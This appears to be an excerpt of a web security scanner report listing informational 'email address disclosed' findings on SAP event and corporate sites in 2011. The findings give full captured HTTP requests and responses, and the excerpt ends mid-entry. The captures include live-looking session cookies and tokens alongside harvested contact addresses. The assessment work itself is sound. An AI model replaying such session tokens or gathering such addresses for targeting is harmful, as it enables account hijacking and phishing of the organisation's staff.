User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:33 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:33 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:33 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:32 GMT
Content-Length: 53309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.33. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The following email address was disclosed in the response:

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:25 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 87585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="mailto:webmaster@sap.com?subject=Questions%20or%20Comments%20About%20SAP.com">webmaster@sap.com</a>
...[SNIP]...
19.34. http://www.sapandasug.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapandasug.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.sapandasug.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapphirenow.com/madrid/Overview.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:24:49 GMT
Content-Length: 7194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="mailto:webmaster@sapandasug.com?subject=Web Inquiry: SAP and ASUG Web Site">
...[SNIP]...
19.35. http://www.sapandasug.com/virtual/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapandasug.com
Path:   /virtual/

Issue detail

The following email address was disclosed in the response:

Request

GET /virtual/ HTTP/1.1
Host: www.sapandasug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:04:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
regate this information with my personal data. I acknowledge that I can at any time request information on my personal data held by SAP, that I can update and correct such data by sending an e-mail to sapphirenow@sapevents.com, and that I can withdraw my consent given hereby by contacting SAP at webmaster@sap.com.</dd>
...[SNIP]...
19.36. http://www.sapbusinessoptimizer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Home</title>
<meta
...[SNIP]...
<a href="mailto:Value_for_You@sap.com">
...[SNIP]...
<a href="mailto:webmaster@sap.com">webmaster@sap.com</a>
...[SNIP]...
19.37. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<a href="mailto:smeyerborges@lmb-gmbh.de" target="_blank" class="aLink">
...[SNIP]...
19.38. http://www.sapphirenow.com/madrid/js/jquery.colorbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /madrid/js/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /madrid/js/jquery.colorbox.js HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/madrid/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 07 Oct 2011 14:57:41 GMT
Accept-Ranges: bytes
ETag: "d06aa476185cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:23:03 GMT
Content-Length: 26053

// ColorBox v1.3.17.2 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php

(function ($, document, window) {
   var
   // ColorBox Default Settings.    
   // See http://colorpowered.com/colo
...[SNIP]...
19.39. http://www.sapteched.com/china/11/cn/index/home.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapteched.com
Path:   /china/11/cn/index/home.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /china/11/cn/index/home.asp HTTP/1.1
Host: www.sapteched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29014
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQSADCD=MBILMGIAFEHOIDHDAECLIHAH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<a href="mailto:saptechedinfo.china@sap.com?subject=SAP TechEd 2011 Shanghai Inquiry">
...[SNIP]...
19.40. http://www.sapteched.com/emea/about/whoshouldattend.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapteched.com
Path:   /emea/about/whoshouldattend.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /emea/about/whoshouldattend.htm HTTP/1.1
Host: www.sapteched.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASTBDDD=DBGKJPDAPICNJLACGEPPFAMJ; __utma=48829220.526440815.1318688537.1318688537.1318688537.1; __utmb=48829220.2.10.1318688537; __utmc=48829220; __utmz=48829220.1318688537.1.1.utmcsr=teched2011madrid.sapevents.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:23:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 33557
Content-Type: text/html; Charset=utf-8
Expires: Sat, 15 Oct 2011 14:23:53 GMT
Cache-control: private
Content-Length: 33557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>SAP TechEd 201
...[SNIP]...
<a class="navigation" href="mailto:events@sap.com?subject=SAP TechEd 2011 Madrid Inquiry">
...[SNIP]...
<a class="navigation" href="mailto:events@sap.com?subject=SAP TechEd Inquiry">events@sap.com</a>
...[SNIP]...
19.41. http://www.sapteched.com/emea/reghotel/home.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapteched.com
Path:   /emea/reghotel/home.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /emea/reghotel/home.htm HTTP/1.1
Host: www.sapteched.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASTBDDD=DBGKJPDAPICNJLACGEPPFAMJ; __utma=48829220.526440815.1318688537.1318688537.1318688537.1; __utmc=48829220; __utmz=48829220.1318688537.1.1.utmcsr=teched2011madrid.sapevents.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm; __utmb=48829220.3.10.1318688537

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 29370
Content-Type: text/html; Charset=utf-8
Expires: Sat, 15 Oct 2011 14:27:02 GMT
Cache-control: private
Content-Length: 29370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>SAP TechEd 201
...[SNIP]...
<a class="navigation" href="mailto:events@sap.com?subject=SAP TechEd 2011 Madrid Inquiry">
...[SNIP]...
<a class="navigation" href="mailto:events@sap.com?subject=SAP TechEd Inquiry">events@sap.com</a>
...[SNIP]...
19.42. http://www.sapteched.com/sapphirenowsaptechedmadrid/ChooseYourExperience..htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapteched.com
Path:   /sapphirenowsaptechedmadrid/ChooseYourExperience..htm

Issue detail

The following email address was disclosed in the response:

Request

GET /sapphirenowsaptechedmadrid/ChooseYourExperience..htm HTTP/1.1
Host: www.sapteched.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/sapphirenowsaptechedmadrid/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASTBDDD=DBGKJPDAPICNJLACGEPPFAMJ; __utma=48829220.526440815.1318688537.1318688537.1318688537.1; __utmb=48829220.1.10.1318688537; __utmc=48829220; __utmz=48829220.1318688537.1.1.utmcsr=teched2011madrid.sapevents.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:22:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 13489
Content-Type: text/html
Cache-control: private
Content-Length: 13489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>SAPPHIRE NOW + S
...[SNIP]...
<a href="mailto:saptechedinfo.americas@sap.com?subject=Sponsorship:%20SAP%20Virtualization%20Week%202010">
...[SNIP]...
<a href="mailto:saptechedinfo.americas@sap.com?subject=Virtualization%20Week%20Web%20Inquiry">
...[SNIP]...
19.43. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /teched/default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||7df06b41-67e5-4e76-b695-2d83bcab420b|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; expires=Tue, 15-Nov-2011 15:30:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:12 GMT
Content-Length: 29108

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
...[SNIP]...
19.44. http://www.sdn.sap.com/irj/scn/bc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/bc

Issue detail

The following email address was disclosed in the response:

Request

GET /irj/scn/bc HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:53 GMT
Content-Length: 25058
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="mailto:sapnetwork@sap.com" target="_blank">
...[SNIP]...
<a href="mailto:sapnetwork@sap.com" target="_blank">
...[SNIP]...
19.45. https://www.sme.sap.com/irj/portalapps/com.sap.nw.wpc.cssservice/scripts/jquery/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/portalapps/com.sap.nw.wpc.cssservice/scripts/jquery/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /irj/portalapps/com.sap.nw.wpc.cssservice/scripts/jquery/jquery.colorbox-min.js HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sme.sap.com/irj/sme/logon
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000; PortalAlias=sme; a1slocale=en

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: application/x-javascript
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMDAxQkYtOTY3MDE2RjdCNEFCMUU5Nw==
Cache-Control: max-age=86400
Content-Length: 18344
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:32:58 GMT
Connection: keep-alive

/*
   ColorBox v1.2.3 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
   (c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
   Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
*/
(function($){
   
   var element, settings, callback, maxWidth, maxHeight, loadedWidth, loadedHeight, interfaceHeight
...[SNIP]...
19.46. https://www.sme.sap.com/irj/sme/logon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The following email address was disclosed in the response:

Request

GET /irj/sme/logon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; PortalAlias=sme; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33344
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:32:55 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="mailto:sapbusinessbydesign.us@sap.com" target=_blank>
...[SNIP]...
19.47. https://www.sme.sap.com/irj/sme/memberlogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/memberlogin

Issue detail

The following email address was disclosed in the response:

Request

